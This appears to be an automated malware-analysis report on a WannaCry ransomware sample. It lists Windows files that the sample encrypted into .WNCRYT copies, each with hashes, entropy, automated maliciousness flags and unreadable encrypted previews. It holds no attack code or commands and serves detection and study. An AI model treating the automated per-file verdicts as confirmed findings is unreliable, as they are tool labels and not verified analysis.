SHA-256:	D671A36CA0A537D770588D2632BB9000215B0E34E86521739218B214B6639D72
SHA-512:	EE63AFC3E080575CAB8A19DA9C509878B0A19F97300344C7C3DB92493833CDA5141992E6E7F315DBB5DDB575B83B79181EEF78ACB164C65885C3BFD3FD869716
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.....\|...[.Kj.~....fw.......$...@E..UaJ(.;6^Y.,"k.R.c{a....F.F{<:ca.Y.....'..g..4...SA.S..J.Q\..$..QP../...,m.E..0..D.E~]%.V..oCe.).....C.......T.zd..J...L.....E..D%.Iq.^.v......).1.:p'..T......-=.?(.Wlr..;H.{.C.......2.#$.$....!..\......M. g.u#$.1-......................-..;.{<...n.&=..S.?Kb.........[O.p4O`NK.q\|i....;.......k...J...Sf......V..m`....b.7.x.k......?..tv....-..G..F..C?^.y...?..q.f.6....c.Z2...g..."Z......$7...........`#.'Cc5_.).W..c.($..^..M2........ .....I...9...k'.D..P.K<....#.[Vo.tb$..!...f...8m....zk.i[.BrTr..l..x.W...H.C...?..;..BL.V..y.(...Z.s.J.{........6.%..g%.)w..t3?. .....El....\:...!..W.......CK.h5S}.g..C...E....a......$.....N.d.e/.....\=......e....\Q.g..{L.(~.X..W....x.P....m......6fc....X.=...s.2gH&..9.4.0...3.........>..O.n.3<7s.u.....Fs..!..T3.@3.kg. .S~.)..\|z..9.z...}.+0}.'.'.A...1....<q../*l.#...-..u..V...P.... ).tKC..V..n$`8.]..L..-..i`-Z.,..CH.F.M.Q[.m........O........\.J[n.++WB....&L..x..F..G..Z...a.=.

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1920.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	312
Entropy (8bit):	7.1721439464237875
Encrypted:	false
SSDEEP:	6:bkEn7/e3IjPStkE+SD4t+ET7wfe11+4jNRUyiJR91DwWuaI77n:bkEnjeIjxlFt+E3wfF4NqHJtmTj
MD5:	373AFA7C24C399F8415CAAE9C3B6B397
SHA1:	4B5A80719D8B41D1DBD47E103A9B8727ED12936D
SHA-256:	C07F2B875505B45B12DB31896F5B8C336C268248B2EF5845BDFA81CE40D1A52B
SHA-512:	596CA91D94B858BD60C7E9C865BF1787676F64DA99D7018E8D1D572201FBD52AA006D4DA61A0173A4A11608B49E0DC1CFF2B1770532D60AF50D414688EF9962F
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....5...0z.D..@T3..................w..[ffO..!t..s..A.u...Z...0.6.sa....3..{...~h...H....saN.s..2.....76...-]...o.....mb..J........f..m...i...O.....w...?~PNj.F.<.=ifm..~.. ..0.]..u....q.j.$......d.5..j....L..}=x. ..K.....,..R..#fYi!........Rx..lN......................p..?.@.).c6...&is..t6t..+.V.

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1048856
Entropy (8bit):	7.999842205489492
Encrypted:	true
SSDEEP:	24576:aAmYHeq9uK9gN7r9mFlya2495A37ItjFIrmwh3VGktH:aY9uCgnmFj2xEHMm6GkN
MD5:	2006A39C3951F324B4E71AEB62B85BC2
SHA1:	37FEB154D89A72A4740D50E513DB1F3975E80A0A
SHA-256:	0C6F62ADDF047C3B75A2D685AA0F9D35E26CAA0AF0E58BD54CDF018AF546C92D
SHA-512:	570F3BC66B214CC726FBD28A097CF7C7338D25420CE68120C41D5F874009AC6BBB03992F515690F331D5D7539014BD33C73AC8DB8A89EC6E7AA8EC191A7104D9
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....9\...kh/w.V..'..mtC.b..!G.....~.....%.vJ..[ZC..L_.....c..9.{.n.sYE..Y..H...&.G....I.8..!.V!...../.'....'8...t.....D._..pfU..h@.w#.4......U.[ba9.z..l.e..A......=.......D...../..h..a..........Z.........S...A......."1.M.5..C..D......L.C....z...................l.....T..$..eL......c..6.......U..jg.<.A.m7b...a}P.......J....q!.....D.(i.L.M.....'l-.e.R....../#A...Y.m.G$...1..tHd...~...].m..C..0efK.=N.....y.B.WI..F_J\A....+...9..\|.Pq}.@ ...rp..#.{..^.......#%%l^./Zi.=...c.qog\.../s.. .&y...S.b.O..n.....c.=.;W..r.....9~h....D.A.....Q{..pE=d4..y]..%6..O.....;..)...v..T..6.>.p.<\5n.2.#.V._..].Q..o;6"..Y..+.u..;M8........_..d:$...").b....^....m..{..ks....?..H...).3..Ry...d..A.Q......A...M.F...(..a..b..n...$...n......e^.#.Noh`...fe:....r...9.......p.2Cs...x.+._if..*\|./...{_.a...u.Pc....6Y.}w..[...^?... .\2J.... .H..Q.....:......+.cl.qq.E.#...d.).>D>=.?.C9..`.x..{F....T...'^...Yz1..ZV..[.R.....U.d[/J.3.".!p.T(...qK......y....l.!~..@n..k

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_2560.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	312
Entropy (8bit):	7.2255772782899195
Encrypted:	false
SSDEEP:	6:bkEB3V99lqW3xlQzO/3fEVQKH50kEzbfWWyRN9EJ5ryQd6/1jVwJaG3LA5Nm8:bkE193/QzO/0QI0kEzbfbyRkJYq6Njas
MD5:	31B280C3E9BD753344B8A3BC72736FAF
SHA1:	86FD65A2F6E85A67909E17DB5E020C49D31176F7
SHA-256:	DB429A4B2311497F008A586083BB80E1371D359CE7EDFBD55D8D53F65FC4AEA1
SHA-512:	BA52927C96151C9092E35904E30B23E9DF1DF7189217C00BCB509BFAF93CC5CA245E2B81CE6F053DBA4CCB3984F7921A28873A5985F05AB57F09CDB4299FDA61
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....+.....FQN...\|>....V...D.y.c...P..yW...>.o.(.;\|..a..E.:k.Ch...R..9.iRix.\....0Q.VKf.g8..3.;..t..X.4E.z..[...~1... ...3.s. ........._.>s..z-B...xp..T..=.tR8...S....1..E........Gg]..u.n...O... ..m/Uk......^..-..!b..#....J@r....I.N.p9..!..............5...D..U./P.tM.^....n..;.(C...

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1048856
Entropy (8bit):	7.999809063199311
Encrypted:	true
SSDEEP:	24576:+ZDjgFE7ar8WDBnxOgu89fAHmn/xiKjeADMCWhH9:+OFE9qnxOK9fQEJjeADDWT
MD5:	DD123727F39070DFAB5ADCC507650725
SHA1:	68B18BC19CE77052F7F618BA425DD93C2B3D48E3
SHA-256:	7F5AC1D50A7C72F71B85AE0952DC09009BD015BCD879DD38BB6D552DA850EC2A
SHA-512:	F7D0BCCE85509589467DE02F853BAE6783B7A32A23213AF78AFC2CDA8AB6B19E57FFCB58D1E46F22A540547E19481E4A17C053E81F149515AC853448794B8752
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!........NN.......3...L....C.ua.b..#X5.G.-.;,B..P..p.{..22.3.C..................f.....N)j.....w.y... `..3D...........,.....V_......WTn...U..Iq....N......d(.q............j...=S2..&wfNC.. .7eZ..U.+kd.K..2w.....+^>.Xy..5.eq..p#...)..J.".7....V.s..><hZ.............Z..y.+^l....J..._i$..[.....@.l1.[...<.Q..."o....H..5..Rl..q.vk.........^...g....v.._...)-.....KW...d.@]$..].. .2..p9.W[d$..p..$/......s.....u:.D3&.l..E>7....;Jrb?.].2....%..uT.~~. .vX[..s....3....Q....>FE..6..[caa.<./.N...(...dn#5..L..G....<..G.ZUb.....8F\|.m....{....%....~.G.~..pu..R...gP.....],f...9.....9/.1...O.A)...I..T....)TA....g.c,{....."`"cp..f.&..c....ES..T+.T,;s.,].W..x..CZ..e..\|...<...$..:..FQ......H...m..."\|..........F.(.nV....._7Z"9jl..6..QIA.[.v.n.$].=.......\|...+.a....8.D...j.j.y.....X..(.k\|.vf..D'..j>;,^.y..?U.]Z.j...RD}.Z...O..\|B)#...x....l....`;....wTy.Xm.......j..#.[.....}U..U. ..^Q6.S....2&.H;.....7w.v.]lF..._.V........!...<.aW./D..~.>c`V..sX.]..Ur....n.%o..

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_48.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1048856
Entropy (8bit):	7.999812365790911
Encrypted:	true
SSDEEP:	24576:QAsKZWGfcEWEs3esJI9vU1EBV4dN1YDxlWq6D4S:njZWGUEWf3edOiP4dolcD7
MD5:	71ED5B2A0931F8029C80E5730AC2B91B
SHA1:	FC2D27201A0B1343566DC126D50B54A51C13B572
SHA-256:	6DEED0F10C222410C75D722F3EB6FE855DFF7223028B30BA503EFCE953D430AC
SHA-512:	B9A2240EF46BED45225D995B6A0DC3313FAA623470466B782DE4F227C75BBD77AB166DF0F241B3DD82F8BBD05533B13692657EDABC8765CF80EEF13D8CE5AA07
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.....j...D..R...R..Zt.....LN. .$l........]_....W...y.-.b.E.b.p0...)B....$`U...9. ....}h.]T..%..:..&j...K.!^.><........n..&:\|..r.T./M(.}.,...Ut4V..d...5....g..y........u....3..\ ....B^x....V..,`M..]yO.....>.Q2.......//.N.eW@.t...Z.uOO..mWi.rM.z...&..............j.Djt-i.;.. ,.>......t..s..Q."6.`...U>...^O....V.Xr.<`....H$E.... . t.f.].}.T.}....=.i:0V.....ko.o..{.jO3[....H..#.Y..%..S.l....?x...H..r....(Fn.Y.]..{....7.,-.9e.c....r..R.1.ba...p.=.W...A.y...t.O(.Z&..u.B....;.YUk%...V.ft..$.R..ARs.e...9w...>dgg'.tqd#..#A%.x-s..+.C.^..."e<];.....u....\.._....nFHB.T....(......tC.5H.%.y..!.......AF.~B.....Smq.< 8..z{.A.u$.^..,.9B...5..%n}..t. .....r_..^.H.b.....`.......38~]f'@..6..?..z)....!UQ.].b.......E.1<22...@...pI.E.....$...g.[e.>...A.......1!..k.ROp.A(.......[...h..3.1@.5....W.7.z..p_.'.v$"U....k+......i.'.x...r...e..T..m.%.....)I..8.a..../...j..L.`.?k..6..V..0..S.N...;@....bp..L.o.J$..........~....=-..y..q....YI....M..Do;.n.c..'x\'.

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_768.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	312
Entropy (8bit):	7.172723993047377
Encrypted:	false
SSDEEP:	6:bkE56yjJQ59frGmPkv/wZdr7qbrmlbtryA261AvzTn:bkEkqq9frGmK/wXW3mlBWMAvzTn
MD5:	F2AA06678CAD2AF8DF4A60CC517026D1
SHA1:	305DB30D5DB9EC9E7A413ADCE5E5EE1773F4F945
SHA-256:	B7EA7827A864EB2505803767031873B8DC3316FC72DD7C0B8E444BE803F71B6F
SHA-512:	704A2F091FD5B835794A28673496A1A4ABC7E18566A7B5E0D62C5D108D503F702C83E6137F996509C5D72B13BAEC1F5FAE5CE1E9D8D6B44D72C906D5A7A09502
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....Lh...$d1...)P..U.LO+....eE.......A..........+....zS..V.......B..z....A..3............I....L...FU3.0.z.a......'...n.\o...Mj.d>..=(..l.VU...8B..2....@.B.N...%.~..(.\|h...Od^R........(.t..&..."1.....r1..94..@......r4..*.F..'.C.$..\..........P...............h...}d...8..EI....6.?V./s).G..

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	4194584
Entropy (8bit):	7.99995366398728
Encrypted:	true
SSDEEP:	98304:o3J6IhUohuVe5q9utZ26zZ9qZdS2EzbCMiIgG5P1:o3tUdVkq9utZDV8EHCM9j
MD5:	78B76FEC502B75E6473CF4AC44603F8A
SHA1:	17F3A3CA42BC641D790026E48002AF4F5478E641
SHA-256:	12B25400A6A439FA10DD557D457EBC4BF79B622C6BA5BBDEED32E91868B9B408
SHA-512:	16DC1B3DF828D47D0C10FE3BFF12BD692D7DB6BF7977815AEB8A27654A41DBCBF9CFEA4F8C33EC6EC5331F565FFB43F9F9C457BA51D2E32101974143D20A257C
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!........G.w..q.<....n..z.Z....[U+....BGF^p....%.....2.4p\|D.8..Tu...k.......Uq.+.."..a...Y..Xy(........E.pD.....e.8.b.[......q.P."...{vKp....d........[-.O.\|.D..#c...utf...C.Mj.....d1GO^...}O..O....\|...d.Wr....+..O....A.5_..<Q.,j.T\6.)...\....2.x......@......-..............-S..C.....5_k..M......'.......h.S..:z.<...!..w...4....4.........B..6.\|s...F..D&../.D)7.R.......z..xMH.s{L..Lk[...".#..<r.E..4%...+....nc._a...Iy.O....6...l.5K\m...Hs......u..U....;..lb+...*n..=..#f..c.m..@...B.....:X..uy...C......{.....(....T.@..,A.)7......go.nw............d7.l......@.QX33.(.-.}7...+..x.S9NJ..[.O...&.~.m...<GT.....t..?...Q.H.............S,.r..9K...dzd.....j>..)...\|...e-......x...}.C.(.....h$..n..fB.<.C...Xw.9.S..f.S.\T..a.2.....`....Be....:9.....^.O.D.:.G.GB...l....R.......t.......bGd,.#.F}....y.(.".N....{.....A.d..u.<L.....j.B.......`.........b....~../.JB"..\_....i..........A...u..PW.V...Cu.o.@.PJ\|....t...!...)...9..zh....Y.^.9....X$...1m.

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_custom_stream.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	312
Entropy (8bit):	7.104351965996067
Encrypted:	false
SSDEEP:	6:bkEJNrM/z18KpHOfbx8BclFvv39epLl7hCdIyugAv+HUcn+2yTowDljStwv:bkE/re18lmBMJv3CLdhBR+0cnzKT5jSA
MD5:	D220A48093E9A25FB6394D57A1281529
SHA1:	626A8D4D9924368E82314702459B0C5C5C2F9A3E
SHA-256:	884DE11C8BD471C4EF103B1A1DBD373D217DBFDB08FCDDCE604F2B096F1DD4CE
SHA-512:	16D4E8E654DB735878206CAE4E57C56A459FD2A32D805BFBFE27995478D1015CC96D6A8F9FB6ED7FC3E254B6E9C1275CAA3B2E3659D91E9482614B1F60971277
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....cu....T.t..$"};.K...5.D..........+&.9G..K.).Gd$c..c.,..-`....3:.c......$Rn.d..!8<..._..B.f ...q...5o.`.D.I.w...V..&uRQ...&.<h.)g.DK...z...w.W......g..$.T.J.cc..#...s-..T~.%.A..Ds....'+.R...[=...c\|......c.Z...J.w....r.sM...3..z.n<......=*/5.`.............o..........a.7r).%>..:b.q..Um>=

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_exif.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	312
Entropy (8bit):	7.192968626394862
Encrypted:	false
SSDEEP:	6:bkEA+CmCmX+jT7Zt5IgHebOnpc3W1J5s889ka5cjC+EdnrwhFiWWGCh/Q:bkEbOmX+jBt5IFOnpc3CO8y/5cjCihXR
MD5:	5394E22D3F8DDA3CD3A74714BC7CA4A7
SHA1:	0DE0AFAD466FBDFB22F1AB69CE5D39A08A31F339
SHA-256:	54782780F99E777288476A27098F9735749ECB6FE5170781977599E47CFA64D8
SHA-512:	054046E15D494A3B1BB61CC849E127DF6537948A601922E27E3316D50300A02074A5C5881C0517D87854BB0B2C4161BF2E31A290C4D4D94C275C7003D391F357
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......D$2.!@..2.m.j...2.6<...Dy6d...jM..ug. .`.R..3......-I,"..f..h#..L...m.}eKG...I-F.fw..H..cG..m...X;je&%.X..o..8..X.z.h...cF...].....j...D...A.....x..L^...;...D.kq]...11.0u..l....>..E.)'..n5..=O. \|g.Rn.E....2H..2...q.0.r.D*.@tbM....u.F..r..8................AxjP.....].m.TC/".U._1W;..

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	29512
Entropy (8bit):	7.994132601842239
Encrypted:	true
SSDEEP:	768:hf9bLnNoFQdgzAk9ITGVJPXNk+dRfT97aJX4nqllQ:hf93NoiuVyTGv/NvfToS
MD5:	1656A1F968E84E37958554909EF4156F
SHA1:	6DABF3F76FF73418CB39C2C3365E3201A8373349
SHA-256:	90441F4C9754E34C630B807D5C68F6D1434F8E2C50C3773A64827A6E27548A5F
SHA-512:	7DBA3F12A1C0FA82A075956CF6A34AF85B3FC7BE2A18D9363642DAC0CA4636C5B8470C062E13BA6191FB0716924E8652EA621411CB698CD856D34DA7CED39262
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.......s......L...B9...J.{W=o...-).....yi4....q.BN.-..eM..........x..9..0.<AQCo1.,... Io.z...PL.ICZ..r....#.x.......?$.m........B.N.i...bNW..h.I........+..aL.F.%....<..P...-8'.lH.f..H.Y....v.e...my...BJW...l...B...E..OQ.q......_.$.... .k-....e.....0r.......)D...E%.M....7..?.Q6..=..A.u3=.{........%.d.%...q.1k..G.fg7....\|.V.....B..51..e$...+..Y.....j{.XG.{..........o.X.G..U.i3.......&....o.wnm..n..)..y....-...,d...........K..T........5..]+14;n=N......V..z.....E.....)p.8......%\.....k...............B..\|6.7)B...b..}n..z+*...i..=...."A.].E?....A..bD.Dqd....X. .)...@....@..9.$.N;.d..s.5.M.I@......oU:`u......Y.%}h.e.}..}..eO..Tr.U.....'.......$.^...P.U12.....wx....d.}uP......@.@.Q....p.y0%!....iQ^.V....{.V....k...........)3o.....9.\|M.#JSK...\|eYjc.M)..E!.o..Xe......k.u.6....v..\.om.......Lc5...Nu..}.~;.?.I.V...E'8...d3Ll..].....fR..qc>..).J.......n:..A. 5.;..0....T~.k..M.....5wy_..y.S....G....{......4.\..{i.......;.r.$.U...-.~.C...m.....

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	312
Entropy (8bit):	7.2283290608070105
Encrypted:	false
SSDEEP:	6:bkEF4pgqNz9UpkyZp+t/2FWk8TDAo7lIeaUXoRUFYflTmlLM:bkE5qqkyZp4uWk2B7lIeaU2Ucmlg
MD5:	3B53A7427AB798D94A66293FE8434A1B
SHA1:	20D1056F1AF77AA72EB6D185698AFC4071BA2909
SHA-256:	85AE64350796935C776E57CD5F7BD48D607ACEC2E0116DC7AC9F418B5101179A
SHA-512:	94E644B0D40F94E220D2E2864DADDE11E9B67C3A8C61BD1E4519A028E66751F5B0AC36112DB331CE01DC97BB6C05112C7BF0F591D5A3DA0EBCF261F980171BB5
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....4B"...ey.....Cq.....c..=..r..'......8.......q.......B3.%...o..... .....k=....2.....7..s.....J@...h/.U......#Z.],u).^.'..tao.X..[..IcW .]...A...'b5vw.J.uyY..k".d.n.....Yt....;%...Y...c..C..IC.u7 g.R.... .x.."_.......GC..&..E.....o..7..K..r............z...&].g...B..z.&.....6e:.a..v

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_wide.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	312
Entropy (8bit):	7.273326176247102
Encrypted:	false
SSDEEP:	6:bkEFQn1ActTd827k06H0W++tSlZ9XGXALYLNJooVnvc8zoa7:bkEYyU8N0n9WQkLN1Vvx7
MD5:	0F4E74D5F5043B9CCDF57CBBB485539A
SHA1:	D141FE66156E6390D712AAB9449FD7E835CF62FC
SHA-256:	8C05D576EB2AEFC25DE7BBA9A003E4BDACF7F6F5E55C525544B8CFB56B8FABDF
SHA-512:	EA3F15536E2815E5A11AADC09DB7D28E12F697DF57990EF9DB3DBB7EC49574513A01524C77D75A6424FF533D8EF3F2B529F3AF1500D305D4A4BC1B58C662A956
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.......}..j.$.)..B.=T.F.........?G.K..-.OE.;.....c..f.;x........o*Jr.B.....Q...a...:4... 2.8....../..D+% ..~.9C...j......:.j.Ny...8....[o.D......(.y..#......G!btD.8.wrZ%>...r.58...5."k. q.h........#A......B2.JR...(.h..m h.&\|.\...+....y.............-!..(....X.@.[.../.\.`n.u..SD.

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_wide_alternate.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	312
Entropy (8bit):	7.173477892175479
Encrypted:	false
SSDEEP:	6:bkEkLBHma1LKr63OEmvt+hoTgwPaATTVXyYWYB8YK5XreQbTJ4X:bkEktHma1L92+hoE+3NLaPXrzTJ4X
MD5:	74A38BFDF0EA59A4ED71DB20249D84BC
SHA1:	6E6EF8DFC8F520098DEE09F0CE6668BF5AFAB80E
SHA-256:	95E5EDADEC5FAD784F07008FBD50843C64424CCB111EFF189B14A894A9EF475B
SHA-512:	F7306C1C7C1DF39927DDF99C8B802623423DC4E2A27DBC571AFD007617F12F4EAC6147024677249A140F3C5BA2D731547D38ABA611CBD9B66F07CD443C465A91
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....5Uo....5.l.8.\..&1:.}.1F[.....Uo..Y..2 =s<P...2...7..}".."...a...V..hY..X...C.....3i..........P.....u.s......4..L...d.l.om..~r.../..h.........r.#@.g.Oy'2-...D.&.Ur.=...\@.X.....}..1..e<9.P_+.....qh.5T~...3.)oI.}.d.......`...V..}..z..$L.H............G&."..A.9..L..H...p.^.d.U....L.

C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1048856
Entropy (8bit):	7.9998188260782115
Encrypted:	true
SSDEEP:	24576:OslN6maUSuV2nME6Rf281qQhe/iQ0eMWrJ:dXuu0nMaeS0eMWN
MD5:	FF18AFB2C076236D7AC6012A4186C7CB
SHA1:	18748BFDA74D148450AA50E93E14EA280F96EC6E
SHA-256:	6DD57D15D3A7ECC80F9C079D6D0C906187426441B320F30351EB443D67A008D9
SHA-512:	3DDCD02BA9FF99592F885A6DFB03E5478DFD53A73269243B384DEF490E0E4198CD84E15BA86745D3ABE23D597DFA254CDE35F2FBED9BE1364B14D4750481EFF7
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!...."@.G.^....]#DO..+.0.0.]...q...=.. .\.n3.c)w....$......j.u..&..nPY.......KX.Y..\|..1...aJ....'J.......^....i..H....N.}N.y..X]!....J8.....b..'...t..Q..B..0..HI..0.....1Q..B.......O...!f.\..f...%.m../.b.j..._....fUM..$`.X..>.pO.Z..I...%-.I]b..\<3..q.Q.............cx3.\....Uj...sK....T.h...J.9......}\|..........+n.%]:?.jB...h..{f..m T.....-..C...ax...9._.&...;V.2..]>.y).0U.......q...LP....%..>.".qJ......}..B=~zF.x..Wj..F.K......".T.".X...)..K./.q.lBU...;...."k.y.\|._"\....G8.....j.p...g+.2..}n..0!J+....O.p.5 ..b...5kQ..j.........\.8..r.P..z.....V..x...j..(.kPN;.....Z0#.Fp.a6......c.uC/.sd.9.G...._'...(....q=....k.#<..~[..C.V[Md...3Qh.4.bJ....g..n.......(.;9.....m..2...M.`.fdf....$....."5....bc(..S}R.....b-oJ. x..%.....)...0..<.:.QE.A^.,:k....i..Y..P..........L.H.0..L..f..wQ}...j....mt.....9t...4.\.....l.7..K.B...<.;.Wr....4.W....5./.8.R%...&B. .k..N.............,..s./.p.......HCx..H.P..N...HY..]..2.rL.._.R.^(....e}....5.

C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpnidm\1196d63c.jpg.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	6360
Entropy (8bit):	7.971296945350322
Encrypted:	false
SSDEEP:	96:oBEkkn9X2HMB5gIgoB1S6d8VqbyYQkV53ruwu71Z1RDFWpaPbqz0WDkT7v+qDEHD:iW1j3d5yYZ3ruRZnFWoOz0WCPgdL
MD5:	B5581184F9C264CCAB04430850F9C537
SHA1:	EDA966DA60BFA28170C3BE41BC8E97D6E5984BCE
SHA-256:	E0CB51880F7FA76FE3E9423D776413F57DD33083DB6EF5846FE862C1B3F4CD1D
SHA-512:	EEE65C5A703B4CD8BE266220274953F541945ADD14010E05B5B224A3C89BD8F769A54A6D2878371DFCCACFF91AB82AA2073DBC07B07C2C98A25794DBDB438125
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....b^...19.\|...>\|..-.]./.......p..w.@.{..1..}.G>M..$.....N.....K........2Q..O.W..t....Xa.x......4.i\.n.L,.c$....m....w.,.Y.i..2....K>.u....ne..ij....E......kG'.s... i..?....3..H~.n....mY4.. z.[.1..2..>...!O.9..... .Y.?i.7.g.h.Mx....R.okb...+..q../J<...............F...9iK..m.c.B%.....C.V.-...mj..\|.....o.W.......A...3.8.<....h..-k...\|q...9?E......v..p4htD_.H.u.F.J..4E....Pv.._.....b...o._.....i..?.qY.T..r;3......Z.q@.RS....P..PG.\|....._. .h..D../.b.I..<..\.0...J....j..$B......0..D..Z.......=.o.T...`....H...7.Vj..[.......ht.`..o.1F..+.I?O6.Db.V..1.... ..@...y ..P1...V..{.c.%.V.....t36,Cs.ka'..\|5..7C.q.J..e......r..6T.s>G..... ..{5A...o!.....F.....N'Z`Ly.GE.../..ku.u.J8.m..4.n[..g`._..nxR,_....E.o.t.B..8.!}.}.fK4..N..$...k...@D..-;............. .\|p.'... .X......D.v<...t....Xq_@.>6.U.....^.4.+".'..y.Z6...J.%d..........To...a...SS.!..M.b.D....]...x~.m..."..i...p....../H..D.j...'.U..2'..G..%L..MX..4W...2l.z......o..T._.w..mVE..*ey..^].x..

C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpnidm\2b67b297.jpg.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	6760
Entropy (8bit):	7.973281897374574
Encrypted:	false
SSDEEP:	96:oPWOOgqlCdgZvgGvUkfHzQUxGZDOCUhj1pCbNyN1FaXubZ1bSJKOCDiWrCZN0yhT:dOO/Z5SyzPGcx1Yc7aX2nOqiZN0Py9SE
MD5:	A59B2635B35C4C74B6B5B520F0244E34
SHA1:	410579284633AB11186CBD3459D664AAA40ABF98
SHA-256:	74BD47BBBD9059F0290B30F575D952611051E3703C0DB29FD6719614BC262A65
SHA-512:	F978FA6265DD10C448D34F668F18C2A826F78D84200D73AD40BE3028C781C19AC19B6568EA1AF84466528807F2325CC19D69EF7783BD3328C8007F4ABE7AAC21
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......Qx.U.^.\|l.....L..............k...B....O.....J;p....WRd.d..'J.EG.....Y_....B(...<..X....>.o.D..r$o.t......Ho........n......V...<..$...................w.H_._..E.8..6J...`..%.Y.....S.F.4.&..E.=......&S.0...-..xU7...........$.uoP..,..(o.`.C....QHF.....K........]}u..X.y86..,c...\|......7...}f.-.2......R....0...X...{.6.K.....l.>...^/LK.V...g'#......2JV.C..~=:.P...m..U.MS..........0..~EB.Lt.-.o.+W....m.QL......X..G.........)...Q.U..8`...1.\..O...Y....s.....[.oR...T.m..8.Oa.b.6..Q\.-.n.l.....VWJ.}..l..9...N.Ip.Itd.....Bx./...i.F.k.........LN.(H...q.yF}..-j.h...J....y..2..g..,5.'...M.....bRpa.+]=...L.=....> ...B\..w.~u...,...bt.Nk...:...Q9..V..n.]p..~j..G.....- q5..F.G\.).....L....J{....R....D7..m...B.f.]G..7...........G...zM..+....T./..Z...U.hvQ.G...5.2.n.t...C.0X..Y...=.,E..WC".J.......n3.Pp.iCdzf.S...)uT.M..\|Hzw.H.Ru.....)%../.....89p.P..T.f...,.....TRo..U..'.;N..ng(.rk+.>.}EE....%.B...../Y n6........7....kYaw$..@..;.v.....$...>..t'j

C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpnidm\36378e77.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	23448
Entropy (8bit):	7.99187094602381
Encrypted:	true
SSDEEP:	384:Xv77+B54KNHRPqo49V7Md1frk6J3Yho3W7zcNstffdvomh6g7s3AzMr9bUrQ3CPX:Ajjqo49uzrkEIKm7zmKdx7swzMh4rQ3U
MD5:	D79A1C7F24F1B4B39AFB2CC476A263B3
SHA1:	44BC6FE63BA7ED54221279C87666FB416D059D14
SHA-256:	65B39F0D57B9D4B0BBFCC9B6186B1245B6CF70FA5754336EB647BFA42E1634A2
SHA-512:	CE919A2AEF2B37F9C8EF7F6E23F75FBE60246F2E4E6146F9269EC248340741E67E4FDD0F84FD69B52EA9D1BB7550D8DB6E7A186A7AEFED717373AD3ED76DA87B
Malicious:	true
Reputation:	unknown
